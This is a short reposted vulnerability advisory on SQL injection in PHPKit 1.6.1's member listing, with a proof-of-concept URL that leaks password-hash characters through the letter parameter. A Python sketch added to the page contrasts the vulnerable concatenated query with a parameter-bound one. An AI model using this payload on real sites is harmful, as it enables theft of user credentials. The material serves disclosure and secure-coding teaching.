Terror Hellish

(Hellish Crime)

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1

SQL Injection in include.php?path=login/member.php

The parameters usernick and letters are vulnerable to SQL Injections.
POC:
/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'/*

This will show the user "phuket" if the first character of his password
hash is '8'.
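
As an added example (not part of the advisory and not PHPKit's code), the Python sketch below shows why the PoC above acts as a true/false test when a request value is concatenated into the query text, and how binding the value removes that behaviour. The table layout, the user_nick column, the LIKE query and the stored values are assumptions constructed for illustration; only user_pw and the PoC string come from the page.

```python
import sqlite3
from urllib.parse import unquote

# Value of the "letter" parameter from the PoC above, URL-decoded.
POC_LETTER = unquote("phuket'%20AND%20MID(user_pw,1,1)='8'/*")

def make_db():
    """Constructed stand-in table; only the user_pw column is named on the page."""
    db = sqlite3.connect(":memory:")
    # SQLite has no MID(); register one so the MySQL-style PoC parses unchanged.
    db.create_function("MID", 3, lambda s, start, n: s[start - 1:start - 1 + n])
    db.execute("CREATE TABLE members (user_nick TEXT, user_pw TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [("phuket", "8" + "0" * 31),   # constructed hash values
                    ("alice", "c" + "0" * 31)])
    return db

def list_members_concat(db, letter):
    """Assumed vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT user_nick FROM members WHERE user_nick LIKE '" + letter + "%'"
    return [row[0] for row in db.execute(sql)]

def list_members_bound(db, letter):
    """Hardened form: the value is bound as data and its LIKE wildcards are escaped."""
    esc = letter.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT user_nick FROM members WHERE user_nick LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, (esc + "%",))]

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", list_members_concat(db, POC_LETTER))
    print("bound:       ", list_members_bound(db, POC_LETTER))
    print("bound, 'p':  ", list_members_bound(db, "p"))
```

With the bound query the whole PoC string is compared as a literal nickname prefix, so the response no longer depends on the contents of user_pw.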

SQL Injection in include.php?path=login/imcenter.php

Source: securityfocus.com

+ Posted on Wednesday, 22 Shahrivar 1385, at 0:57 by |